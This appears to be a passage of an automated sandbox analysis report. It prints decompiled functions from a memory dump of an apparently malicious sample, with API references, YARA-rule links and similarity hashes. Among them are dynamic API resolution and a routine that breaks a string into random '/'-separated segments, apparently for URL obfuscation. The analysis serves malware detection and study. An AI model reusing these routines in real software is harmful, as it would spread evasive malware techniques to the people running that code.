Instruction Fuzzy Hash: 0111C473504615EFDFA45BF49844E8E37FCAF15365B214839FA6887384DB7488D0E690

Uniqueness

Uniqueness Score: -1.00%

Function 0100A2D9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0100A2D9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E01006108(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0100A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x100d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x0100a2d9
0x0100a2e6
0x0100a2e8
0x0100a34b
0x00000000
0x0100a34b
0x0100a300
0x0100a307
0x0100a313
0x0100a318
0x0100a31a
0x0100a31c
0x0100a31e
0x0100a320
0x0100a322
0x0100a32e
0x0100a33e
0x00000000
0x0100a330
0x0100a330
0x0100a337
0x0100a344
0x0100a344
0x0100a344
0x0100a337
0x0100a32e
0x0100a349
0x00000000
0x00000000
0x0100a34f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,010015D7,?,?,00000000,00000000), ref: 0100A313
ResetEvent.KERNEL32(?), ref: 0100A318
GetLastError.KERNEL32 ref: 0100A330
GetLastError.KERNEL32(?,?,00000102,010015D7,?,?,00000000,00000000), ref: 0100A34B

Part of subcall function 01006108: lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,0100A2F8,?,?,?,?,00000102,010015D7,?,?,00000000), ref: 01006114
Part of subcall function 01006108: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0100A2F8,?,?,?,?,00000102,010015D7,?), ref: 01006172
Part of subcall function 01006108: lstrcpy.KERNEL32(00000000,00000000), ref: 01006182

SetEvent.KERNEL32(?), ref: 0100A33E

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: f503deb0325e9805559e1aee99265660af806066a9bc479920aebcdd99af515c
Instruction ID: 1394aaabcc63f57153cc4c505d4265cf7400bed2ed1b42bd3c8ec7c35c4c2f12
Opcode Fuzzy Hash: f503deb0325e9805559e1aee99265660af806066a9bc479920aebcdd99af515c
Instruction Fuzzy Hash: 75018B31204301EBFA33AB78DC44F5BBBE9AF49364F108B65F5D1920E1C7A2E414DA60

Uniqueness

Uniqueness Score: -1.00%

Function 010019D0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E010019D0(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x100d27c;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x100d254; // 0x2d4
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x100d2a4; // 0x460a5a8
				_t3 = _t12 + 0x100e0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x100d2a4; // 0x460a5a8
				_t4 = _t17 + 0x100ea06; // 0x6f577349
				 *0x100d274 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x100d27c = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x010019d4
0x010019d9
0x010019de
0x010019e6
0x01001a1c
0x01001a1e
0x01001a25
0x01001a29
0x01001a2b
0x01001a2b
0x01001a29
0x01001a2e
0x01001a33
0x01001a33
0x010019e8
0x010019ed
0x010019f4
0x010019fa
0x01001a00
0x01001a08
0x01001a0d
0x01001a13
0x01001a1a
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,0100A273,?,00000001,?,?,?,01005C19,?), ref: 010019F4
GetProcAddress.KERNEL32(00000000,6F577349), ref: 01001A0D

Strings

Nxt, xrefs: 01001A0D
PWxt, xrefs: 01001A13

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: PWxt$Nxt
API String ID: 1646373207-1081431061
Opcode ID: d85ed9b30925d12005055c50f57dd13d1172a9493b92e8accc4e354030031fcd
Instruction ID: ba31da834c3d3aa03de0e03820ada63115a551b860fbd5c2032635adaef61576
Opcode Fuzzy Hash: d85ed9b30925d12005055c50f57dd13d1172a9493b92e8accc4e354030031fcd
Instruction Fuzzy Hash: D6F06275A11206EFEB33DFECE904A9A33ECEB19714F000194E484D7144E779EA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01007B9D, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E01007B9D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x100d2a4; // 0x460a5a8
					_t5 = _t103 + 0x100e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x100c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x100d2a4; // 0x460a5a8
												_t28 = _t109 + 0x100e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x100d2a4; // 0x460a5a8
														_t33 = _t79 + 0x100e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x01007ba2
0x01007bab
0x01007bac
0x01007bb0
0x01007bb6
0x01007bbc
0x01007bc5
0x01007bcb
0x01007bd5
0x01007bd7
0x01007bdd
0x01007be2
0x01007bed
0x01007bf3
0x01007bf8
0x01007d1a
0x01007bfe
0x01007bfe
0x01007c0b
0x01007c11
0x01007c17
0x01007c1b
0x01007c21
0x01007c2e
0x01007c32
0x01007c38
0x01007c3b
0x01007c43
0x01007c44
0x01007c48
0x01007c4c
0x01007c4f
0x01007c52
0x01007c58
0x01007c61
0x01007c67
0x01007c68
0x01007c6b
0x01007c6c
0x01007c6d
0x01007c75
0x01007c76
0x01007c77
0x01007c79
0x01007c7d
0x01007c81
0x00000000
0x00000000
0x01007c87
0x01007c90
0x01007c96
0x01007ca0
0x01007ca4
0x01007ca6
0x01007cb3
0x01007cb7
0x01007cbf
0x01007cc4
0x01007cd6
0x01007cd8
0x01007cde
0x01007cde
0x01007ce7
0x01007ce7
0x01007ce9
0x01007cef
0x01007cef
0x01007cf2
0x01007cf8
0x01007cfb
0x01007d04
0x00000000
0x00000000
0x00000000
0x01007d04
0x01007c58
0x01007c52
0x01007c3b
0x01007d0a
0x01007d0a
0x01007d10
0x01007d10
0x01007d16
0x01007d16
0x01007d1f
0x01007d25
0x01007d25
0x01007be2
0x01007d2e

APIs

SysAllocString.OLEAUT32(0100C2B0), ref: 01007BED
lstrcmpW.KERNEL32(00000000,0076006F), ref: 01007CCE
SysFreeString.OLEAUT32(00000000), ref: 01007CE7
SysFreeString.OLEAUT32(?), ref: 01007D16

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: c595e70ee7b91754ac6cfcf7f05af461e96c1f78ac74651dd46f65294d2fb089
Instruction ID: 95c5618d108fc4d3fa1f85f304b390e3e7770a13d1466dee31294e3e06047a8a
Opcode Fuzzy Hash: c595e70ee7b91754ac6cfcf7f05af461e96c1f78ac74651dd46f65294d2fb089
Instruction Fuzzy Hash: 2F516F71D0050AEFDB12EFA8C4889EEB7B9FF89700F148599E945EB250D735AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010057D8, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E010057D8(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E0100A190(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E010013CE(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E01006269(_t101,  &_v236, _a8, _t96 - _t81);
					E01006269(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E010013CE(_t101, 0x100d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E010013CE(_a16, _a4);
						E010056A4(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0100B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0100B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E01001116(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E01001469(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0100A385(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x100d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x010057db
0x010057e7
0x010057ed
0x010057f2
0x010057f6
0x01005953
0x01005957
0x01005957
0x010057fc
0x01005800
0x01005804
0x01005807
0x01005812
0x01005818
0x0100581d
0x01005820
0x0100583a
0x01005846
0x0100584f
0x01005859
0x0100585e
0x01005860
0x01005863
0x01005911
0x01005917
0x01005928
0x0100593b
0x0100594b
0x00000000
0x01005950
0x0100586c
0x01005873
0x01005877
0x0100587d
0x0100587f
0x01005881
0x01005883
0x01005885
0x0100588f
0x01005894
0x01005896
0x01005898
0x01005899
0x0100589a
0x0100589b
0x010058a2
0x010058a9
0x010058ac
0x010058ac
0x01005879
0x01005879
0x01005879
0x010058b4
0x010058bc
0x010058c5
0x010058ca
0x010058ca
0x010058cf
0x00000000
0x00000000
0x010058d1
0x010058d4
0x010058de
0x00000000
0x00000000
0x010058e0
0x010058e0
0x010058ea
0x010058ca
0x010058cf
0x00000000
0x00000000
0x00000000
0x010058cf
0x010058f4
0x010058f7
0x010058fa
0x01005901
0x01005901
0x0100590e
0x00000000
0x0100590e
0x01005809
0x0100580d
0x0100580e
0x01005810
0x00000000
0x00000000
0x00000000
0x01005810
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 01005885
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0100589B
memset.NTDLL ref: 0100593B
memset.NTDLL ref: 0100594B

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 911fa3f10fcf6ae836f8dd3d941237b13188eddcc5f04c87c2b19139c128488f
Instruction ID: 16deced05bf017dd932b3205c76d3a83a83ddabd1b773011750cb316e0fa27a2
Opcode Fuzzy Hash: 911fa3f10fcf6ae836f8dd3d941237b13188eddcc5f04c87c2b19139c128488f
Instruction Fuzzy Hash: 00418431A0021AABEB12DFA8CC44BEE77B9EF55310F108569F955A71C0DB709A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1683C5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1683FB
__isleadbyte_l.LIBCMT ref: 6E168429
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E168457
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E16848D

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 36c4ef31e035b47371935661d6fb83af9b075534530f5ff178f0f4b06d8fba7c
Instruction ID: 9582d29b72939f4acb0d223d3ab3514779a2aa85150d6c09bfe2597b497a4910
Opcode Fuzzy Hash: 36c4ef31e035b47371935661d6fb83af9b075534530f5ff178f0f4b06d8fba7c
Instruction Fuzzy Hash: 28318131604256EFEB618EA5CC44BAA7FB9FF42314F214569E8648B1A0D731D8E1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 01009306, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01009306(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x100d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x100d2a4; // 0x460a5a8
				_t3 = _t8 + 0x100e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E01007FCE(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x100d2a8, 1, 0, _t30);
					E01005DE8(_t30);
				}
				_t12 =  *0x100d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E010024C7() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E01005CB0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x100d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E010013E3(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x01009307
0x0100930e
0x01009318
0x0100931c
0x01009322
0x01009331
0x01009338
0x0100933c
0x0100934e
0x01009350
0x01009350
0x01009355
0x0100935c
0x010093b3
0x010093b3
0x010093b9
0x010093bb
0x010093bb
0x010093c5
0x010093c9
0x010093db
0x010093db
0x010093df
0x010093e5
0x010093e5
0x00000000
0x01009375
0x0100937a
0x01009382
0x01009386
0x0100938a
0x0100938a
0x01009397
0x0100939b
0x0100939f
0x010093f4
0x010093fa
0x010093fa
0x010093ad
0x010093b1
0x010093e8
0x010093ea
0x010093ed
0x010093ed
0x00000000
0x010093ea
0x010093b1
0x00000000
0x0100939b

APIs

Part of subcall function 01007FCE: lstrlen.KERNEL32(0100197C,00000000,00000000,00000027,00000005,00000000,00000000,01008899,74666F53,00000000,0100197C,0100D00C,?,0100197C), ref: 01008004
Part of subcall function 01007FCE: lstrcpy.KERNEL32(00000000,00000000), ref: 01008028
Part of subcall function 01007FCE: lstrcat.KERNEL32(00000000,00000000), ref: 01008030

CreateEventA.KERNEL32(0100D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0100A849,?,00000001,?), ref: 01009347

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

WaitForSingleObject.KERNEL32(00000000,00004E20,0100A849,00000000,00000000,?,00000000,?,0100A849,?,00000001,?,?,?,?,0100787A), ref: 010093A7
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,0100A849,?,00000001,?), ref: 010093D5
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0100A849,?,00000001,?,?,?,?,0100787A), ref: 010093ED

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: e3f6a2de3816c797c4879a5e1439a190f32900b92943d54a4be04895863768e4
Instruction ID: 5e59d020613ab37b94a03dc4b80a36f19a866d67e72394cccd851719de7043fe
Opcode Fuzzy Hash: e3f6a2de3816c797c4879a5e1439a190f32900b92943d54a4be04895863768e4
Instruction Fuzzy Hash: 3F2156329013115BF7335BAC9C84AAB77D8EB88718F058264FBC9E71C2CB25C8018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0100A79A, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0100A79A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E01007D9E(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E01009882(_t23);
						}
					}
					return _t38;
				}
				if(E01004EC8(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x100d2a8, 1, 0,  *0x100d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0100230E(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E010094E5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E01009D8B(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E01009306( &_v32, _t39);
					goto L13;
				}
			}

0x0100a79a
0x0100a7a7
0x0100a7ad
0x0100a7ae
0x0100a7af
0x0100a7b0
0x0100a7b1
0x0100a7b5
0x0100a7c1
0x0100a7c5
0x0100a84d
0x0100a84d
0x0100a850
0x0100a852
0x0100a85a
0x0100a85a
0x0100a860
0x0100a863
0x0100a863
0x0100a860
0x0100a86e
0x0100a86e
0x0100a7d8
0x0100a7da
0x0100a7da
0x0100a7f1
0x0100a7f5
0x0100a7f8
0x0100a803
0x0100a80a
0x0100a80a
0x0100a813
0x0100a817
0x0100a825
0x0100a819
0x0100a819
0x0100a81a
0x0100a81b
0x0100a81c
0x0100a81d
0x0100a81e
0x0100a81e
0x0100a82a
0x0100a82d
0x0100a831
0x0100a833
0x0100a833
0x0100a83a
0x00000000
0x0100a83c
0x0100a83c
0x0100a849
0x00000000
0x0100a849

APIs

CreateEventA.KERNEL32(0100D2A8,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,0100787A,?,00000001,?), ref: 0100A7EB
SetEvent.KERNEL32(00000000,?,?,?,0100787A,?,00000001,?,00000002,?,?,010019AA,?), ref: 0100A7F8
Sleep.KERNEL32(00000BB8,?,?,?,0100787A,?,00000001,?,00000002,?,?,010019AA,?), ref: 0100A803
CloseHandle.KERNEL32(00000000,?,?,?,0100787A,?,00000001,?,00000002,?,?,010019AA,?), ref: 0100A80A

Part of subcall function 0100230E: WaitForSingleObject.KERNEL32(00000000,?,?,?,0100A82A,?,0100A82A,?,?,?,?,?,0100A82A,?), ref: 010023E8

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 58aca1e1858444080cb612a29b88d232ca61528dbebcdae3faf9989d9395ae58
Instruction ID: 53d7c329195466db7d3ae5ac15291d1d07300e7db4364f6a2e9bfe389f45fb59
Opcode Fuzzy Hash: 58aca1e1858444080cb612a29b88d232ca61528dbebcdae3faf9989d9395ae58
Instruction Fuzzy Hash: 0921C873E00215EBFB22BFE888848EE77B8EF44214F014565FBD5A7180D7349A42C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01008D06, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01008D06(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x100d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x100d250; // 0x6043878
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x100d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x01008d0e
0x01008d11
0x01008d17
0x01008d2f
0x01008d31
0x01008d36
0x01008d38
0x01008d3b
0x01008d3d
0x01008d40
0x01008d42
0x01008d42
0x01008d44
0x01008d4f
0x01008d54
0x01008d65
0x01008d6d
0x01008d72
0x01008d75
0x01008d78
0x01008d7a
0x01008d7d
0x01008d80
0x01008d80
0x01008d83
0x01008d8e
0x01008d93
0x01008d9d

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0100624C,00000000,?,?,01006028,?,056195B0), ref: 01008D11
RtlAllocateHeap.NTDLL(00000000,?), ref: 01008D29
memcpy.NTDLL(00000000,?,-00000008,?,?,?,0100624C,00000000,?,?,01006028,?,056195B0), ref: 01008D6D
memcpy.NTDLL(00000001,?,00000001), ref: 01008D8E

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

